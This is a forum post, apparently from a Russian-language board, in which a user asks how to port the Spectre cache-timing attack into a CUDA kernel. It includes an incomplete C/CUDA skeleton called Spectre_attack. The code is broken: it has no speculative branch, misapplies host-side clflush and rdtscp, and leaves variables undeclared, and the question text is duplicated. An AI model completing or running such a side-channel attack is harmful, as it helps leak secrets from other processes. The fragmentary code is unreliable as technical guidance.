cuda programmers inside the forum --> i am trying to port spectre inside cuda kernel shared memory
the problem is how does the reptoline affect such the accuracy
--> also for example if secret value is absent or present inside the cache --> the timing measurement changes? but how? i cannot understand
--> how man know timing difference < threshold_value == success or failure? --> how often this comes for example there is noise inside timing measurements or race for shared resources?
can man use cudaOccupancyMaxPotentialBlockSize and nvprof ? what settings?
the problem is how does the reptoline affect such the accuracy
--> also for example if secret value is absent or present inside the cache --> the timing measurement changes? but how? i cannot understand
--> how man know timing difference < threshold_value == success or failure? --> how often this comes for example there is noise inside timing measurements or race for shared resources?
can man use cudaOccupancyMaxPotentialBlockSize and nvprof ? what settings?
C:
unsigned char secret = 0;
unsigned char target[256];
unsigned char table[256 * 4096];
__global__ void Spectre_attack(unsigned char* target, unsigned char* table, int offset)
{
__shared__ unsigned char secret;
if (threadIdx.x == 0) {
secret = target[offset];
}
__syncthreads();
unsigned char value = table[secret * blockDim.x + threadIdx.x];
// continue spectre gpu parallel + shared memory????
}
int main()
{
// init --> target buffer+table....
_mm_clflush(&secret);
// gpu kernel param
dim3 grid_dim(1, 1, 1);
dim3 block_dim(256, 1, 1);
// run --> measure timing difference
for (int i = 0; i < 1000; i++) {
Spectre_attack<<<grid_dim, block_dim>>>(target, table, offset);
cudaDeviceSynchronize();
unsigned int junk;
unsigned long long start_time = __rdtscp(&junk);
// read --> secret value inside gpu memory
unsigned long long end_time = __rdtscp(&junk);
if (end_time - start_time < threshold) {
// secret value --> access
}
}
return 0;
}
Последнее редактирование: